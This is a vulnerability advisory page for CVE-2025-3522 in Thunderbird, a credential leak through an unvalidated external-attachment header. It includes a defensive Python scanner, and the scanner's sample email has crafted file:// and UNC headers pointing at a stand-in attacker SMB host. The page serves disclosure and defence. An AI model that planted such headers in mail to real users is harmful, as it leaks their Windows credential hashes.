CVE-2025-3522: Open Redirect in Mozilla Thunderbird

Severity: 6.3 MEDIUM (NVD)
EPSS: 0.2% (top 54.11%)
CISA KEV: Not in KEV
Exploit: No known exploits
Affected products: see Affected Packages below
Timeline: Published Apr 15; latest update Jul 22

Description

Thunderbird processes the X-Mozilla-External-Attachment-URL header to handle attachments that are hosted externally (detached attachments). When an email is opened, Thunderbird accesses the specified URL to determine the file size, so the first request is made without any click on the attachment; it then navigates to the URL when the user clicks the attachment. Because the URL is not validated or sanitized, it can reference internal resources such as chrome:// URLs, or file:// links that point at an SMB share. A file:// link to an SMB share makes Windows authenticate to the remote server, potentially leaking hashed Windows credentials and opening the door to more serious security issues.
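The validation the description says is missing can be applied before the message reaches the client, for example at a mail gateway or when triaging a mailbox after the fact. The following is an added example and not Thunderbird's own code: it parses a message, collects every X-Mozilla-External-Attachment-URL header from each MIME part, and rejects anything other than http(s), treating file://, chrome://, and bare UNC paths as the dangerous cases the advisory names. The allow-list policy and the sample message are assumptions constructed for this example.

```python
"""Scan an RFC 5322 message for X-Mozilla-External-Attachment-URL headers and
reject URLs whose scheme Thunderbird should never have followed (added example)."""
import email
from email import policy
from urllib.parse import urlparse

# Header Thunderbird consults for externally hosted (detached) attachments.
EXTERNAL_ATTACHMENT_HEADER = "X-Mozilla-External-Attachment-URL"

# Hypothetical policy for this example: only web URLs are acceptable.
ALLOWED_SCHEMES = {"http", "https"}


def classify_url(url):
    """Return (verdict, reason) for one external attachment URL."""
    u = url.strip()
    # A bare UNC path or protocol-relative path resolves to an SMB share on
    # Windows and triggers NTLM authentication before any content is read.
    if u.startswith("\\\\") or u.startswith("//"):
        return "reject", "UNC/protocol-relative path to an SMB share"
    scheme = urlparse(u).scheme.lower()
    if not scheme:
        return "reject", "schemeless URL"
    if scheme in ("file", "smb"):
        return "reject", scheme + ":// can point at an SMB share and leak NTLM hashes"
    if scheme == "chrome":
        return "reject", "chrome:// reaches Thunderbird-internal resources"
    if scheme in ALLOWED_SCHEMES:
        return "allow", "web URL"
    return "reject", "unexpected scheme " + repr(scheme)


def scan_message(raw_bytes):
    """Walk every MIME part and return (part_index, url, verdict, reason)
    for each X-Mozilla-External-Attachment-URL header found."""
    msg = email.message_from_bytes(raw_bytes, policy=policy.default)
    findings = []
    for idx, part in enumerate(msg.walk()):
        for value in part.get_all(EXTERNAL_ATTACHMENT_HEADER, []):
            verdict, reason = classify_url(str(value))
            findings.append((idx, str(value).strip(), verdict, reason))
    return findings


def message_is_safe(raw_bytes):
    """True when every external attachment URL in the message is allowed."""
    return all(f[2] == "allow" for f in scan_message(raw_bytes))


# Constructed sample message (not a real capture): one detached attachment
# pointing at an SMB share via file://, one at a web server, one at a UNC path.
SAMPLE_EML = b"""From: sender@example.test
To: victim@example.test
Subject: quarterly report
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

See attached.
--b1
Content-Type: application/pdf; name="report.pdf"
Content-Disposition: attachment; filename="report.pdf"
X-Mozilla-External-Attachment-URL: file://attacker.example.test/share/report.pdf

--b1
Content-Type: application/pdf; name="slides.pdf"
Content-Disposition: attachment; filename="slides.pdf"
X-Mozilla-External-Attachment-URL: https://files.example.test/slides.pdf

--b1
Content-Type: application/pdf; name="notes.pdf"
Content-Disposition: attachment; filename="notes.pdf"
X-Mozilla-External-Attachment-URL: \\\\attacker.example.test\\share\\notes.pdf

--b1--
"""

if __name__ == "__main__":
    for idx, url, verdict, reason in scan_message(SAMPLE_EML):
        print(f"part {idx}: {verdict:6} {url}  ({reason})")
    print("message safe:", message_is_safe(SAMPLE_EML))
```

Because the size lookup happens as soon as the message is opened, a filter that only intercepts clicks is too late; stripping or rewriting the header at ingress is the point where this check belongs. The same scan can be run over an existing mailbox (one raw message at a time) to find messages that already carry such URLs.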

CVSS vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L
Exploitability: 2.8 | Impact: 3.4

Affected Packages (2 packages)

NVD: mozilla/thunderbird 129.0 to 137.0.2 (+1 more)
Debian: mozilla/thunderbird < 1:128.10.1esr-1~deb11u1 (+3 more)

🔴 Vulnerability Details (3)

GHSA: GHSA-78fw-w53r-pgwg: Thunderbird processes the X-Mozilla-External-Attachment-URL header to handle attachments which can be hosted externally (2025-04-15)
CVEList: Leak of hashed Window credentials via crafted attachment URL (2025-04-15)
OSV: CVE-2025-3522: Thunderbird processes the X-Mozilla-External-Attachment-URL header to handle attachments which can be hosted externally (2025-04-15)

📋 Vendor Advisories (5)

Ubuntu: Thunderbird vulnerabilities (2025-07-22)
Red Hat: thunderbird: Leak of hashed Window credentials via crafted attachment URL (2025-04-15)
Debian: CVE-2025-3522: thunderbird - Thunderbird processes the X-Mozilla-External-Attachment-URL header to handle att... (2025)
Mozilla: Mozilla Foundation Security Advisory 2025-26: CVE-2025-3522
Mozilla: Mozilla Foundation Security Advisory 2025-27: CVE-2025-3522
Source: cvebase